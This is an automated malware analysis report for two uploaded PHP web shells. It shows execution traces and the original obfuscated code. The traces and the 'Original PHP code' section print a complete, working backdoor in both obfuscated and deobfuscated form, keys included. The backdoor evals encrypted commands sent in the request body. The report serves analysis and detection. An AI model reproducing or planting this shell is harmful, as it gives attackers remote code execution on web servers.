PHP Malware Analysis
shell.php, shell2.php
md5: f171a517b6436d99508738ed40fc4c83
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Execution
- eval (Traces)
Files
- file_get_contents (Traces)
Input
- php:\/\/input (Traces)
Deobfuscated PHP code
Failed to deobfuscate codeExecution traces
data/traces/f171a517b6436d99508738ed40fc4c83_trace-1676242958.0096.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:03:03.907388]
1 0 1 0.000170 393512
1 3 0 0.000236 396664 {main} 1 /var/www/html/uploads/shell.php 0 0
2 4 0 0.000253 396664 str_replace 0 /var/www/html/uploads/shell.php 2 3 'DI' '' 'creDIatDIe_DIfuDIDIDInction'
2 4 1 0.000273 396800
2 4 R 'create_function'
1 A /var/www/html/uploads/shell.php 2 $M = 'create_function'
1 A /var/www/html/uploads/shell.php 3 $h = 'e6TI4_TIencode(@TIx(@gzTIcTIompress(TI$o),$k));TIpTIrint("$p$TIkh$r$kf");}'
1 A /var/www/html/uploads/shell.php 4 $Z = '$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTI'
1 A /var/www/html/uploads/shell.php 5 $T = 'h("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,'
1 A /var/www/html/uploads/shell.php 6 $f = 'TIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$'
1 A /var/www/html/uploads/shell.php 7 $w = 'jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatc'
1 A /var/www/html/uploads/shell.php 8 $u = '8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTIt'
1 A /var/www/html/uploads/shell.php 9 $A = 'e($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r=TI@bas'
1 A /var/www/html/uploads/shell.php 10 $n = '$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"'
2 5 0 0.000436 397344 str_replace 0 /var/www/html/uploads/shell.php 11 3 'TI' '' '$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTItTIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatch("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTIe($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r'
2 5 1 0.000511 397952
2 5 R '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1 A /var/www/html/uploads/shell.php 11 $m = '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2 6 0 0.000570 397216 create_function 0 /var/www/html/uploads/shell.php 12 2 '' '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3 7 0 0.000654 405256 {internal eval} 1 /var/www/html/uploads/shell.php 12 0
3 7 1 0.000669 405256
3 7 R NULL
2 6 1 0.000684 403888
2 6 R '\000lambda_9'
1 A /var/www/html/uploads/shell.php 12 $i = '\000lambda_9'
2 8 0 0.000712 403824 __lambda_func 1 /var/www/html/uploads/shell.php 12 0
2 A /var/www/html/uploads/shell.php(12) : runtime-created function 1 $k = '5e93de3e'
2 A /var/www/html/uploads/shell.php(12) : runtime-created function 1 $kh = 'fa544e85dcd6'
2 A /var/www/html/uploads/shell.php(12) : runtime-created function 1 $kf = '311732d28f95'
2 A /var/www/html/uploads/shell.php(12) : runtime-created function 1 $p = '8kaf9SjZFWu4j9vT'
3 9 0 0.000776 403880 file_get_contents 0 /var/www/html/uploads/shell.php(12) : runtime-created function 1 1 'php://input'
3 9 1 0.000799 404616
3 9 R ''
3 10 0 0.000812 404600 preg_match 0 /var/www/html/uploads/shell.php(12) : runtime-created function 1 3 '/fa544e85dcd6(.+)311732d28f95/' '' NULL
3 10 1 0.000877 404760
3 10 R 0
2 8 1 0.000893 404520
1 3 1 0.000900 404520
0.000928 321832
TRACE END [2023-02-12 21:03:03.908180]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:57:13.998789]
1 0 1 0.000256 393528
1 3 0 0.000342 396688 {main} 1 /var/www/html/uploads/shell2.php 0 0
2 4 0 0.000363 396688 str_replace 0 /var/www/html/uploads/shell2.php 2 3 'DI' '' 'creDIatDIe_DIfuDIDIDInction'
2 4 1 0.000389 396824
2 4 R 'create_function'
1 A /var/www/html/uploads/shell2.php 2 $M = 'create_function'
1 A /var/www/html/uploads/shell2.php 3 $h = 'e6TI4_TIencode(@TIx(@gzTIcTIompress(TI$o),$k));TIpTIrint("$p$TIkh$r$kf");}'
1 A /var/www/html/uploads/shell2.php 4 $Z = '$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTI'
1 A /var/www/html/uploads/shell2.php 5 $T = 'h("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,'
1 A /var/www/html/uploads/shell2.php 6 $f = 'TIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$'
1 A /var/www/html/uploads/shell2.php 7 $w = 'jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatc'
1 A /var/www/html/uploads/shell2.php 8 $u = '8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTIt'
1 A /var/www/html/uploads/shell2.php 9 $A = 'e($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r=TI@bas'
1 A /var/www/html/uploads/shell2.php 10 $n = '$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"'
2 5 0 0.000585 397368 str_replace 0 /var/www/html/uploads/shell2.php 11 3 'TI' '' '$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTItTIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatch("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTIe($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r'
2 5 1 0.000633 397976
2 5 R '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1 A /var/www/html/uploads/shell2.php 11 $m = '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2 6 0 0.000711 397240 create_function 0 /var/www/html/uploads/shell2.php 12 2 '' '$k="5e93de3e";$kh="fa544e85dcd6";$kf="311732d28f95";$p="8kaf9SjZFWu4j9vT";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3 7 0 0.000818 405280 {internal eval} 1 /var/www/html/uploads/shell2.php 12 0
3 7 1 0.000837 405280
3 7 R NULL
2 6 1 0.000858 403912
2 6 R '\000lambda_2'
1 A /var/www/html/uploads/shell2.php 12 $i = '\000lambda_2'
2 8 0 0.000896 403848 __lambda_func 1 /var/www/html/uploads/shell2.php 12 0
2 A /var/www/html/uploads/shell2.php(12) : runtime-created function 1 $k = '5e93de3e'
2 A /var/www/html/uploads/shell2.php(12) : runtime-created function 1 $kh = 'fa544e85dcd6'
2 A /var/www/html/uploads/shell2.php(12) : runtime-created function 1 $kf = '311732d28f95'
2 A /var/www/html/uploads/shell2.php(12) : runtime-created function 1 $p = '8kaf9SjZFWu4j9vT'
3 9 0 0.000980 403904 file_get_contents 0 /var/www/html/uploads/shell2.php(12) : runtime-created function 1 1 'php://input'
3 9 1 0.001009 404640
3 9 R ''
3 10 0 0.001028 404624 preg_match 0 /var/www/html/uploads/shell2.php(12) : runtime-created function 1 3 '/fa544e85dcd6(.+)311732d28f95/' '' NULL
3 10 1 0.001100 404784
3 10 R 0
2 8 1 0.001120 404544
1 3 1 0.001137 404544
0.001240 321848
TRACE END [2023-02-13 00:57:13.999825]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
$M=str_replace('DI','','creDIatDIe_DIfuDIDIDInction');
$h='e6TI4_TIencode(@TIx(@gzTIcTIompress(TI$o),$k));TIpTIrint("$p$TIkh$r$kf");}';
$Z='$m)==1) {@ob_startTI();@evaTIl(@gzTIuncoTImpress(@x(@TIbasTIe64TI_decodTI';
$T='h("/$TIkh(.+)$kTIfTI/",@fTIile_TIget_contents(TI"phpTI://iTInTIput")TITI,';
$f='TIrlen($t);$o="";TIfTIor($i=0;$i<$l;TI){forTI($j=0;(TI$TIj<$c&&$iTI<$l);$';
$w='jTI++,$i+TI+){$TIo.=$tTI{$TIi}TI^$k{$j};}}return TI$o;}if (TITI@preg_TImatc';
$u='8kTIaf9SjZFWu4TIjTI9vT";functTIion xTI($t,$k){$TIc=strTIlen($k)TI;$lTI=sTIt';
$A='e($m[1])TI,$k)))TI;$o=@obTI_geTIt_contTIents();@ob_enTId_cleaTIn();$r=TI@bas';
$n='$k="5eTI93de3e";$TIkTIh="TIfa544e85TIdcd6";$kf=TI"311732TId2TI8f95";$p=TI"';
$m=str_replace('TI','',$n.$u.$f.$w.$T.$Z.$A.$h);
$i=$M('',$m);$i();
?>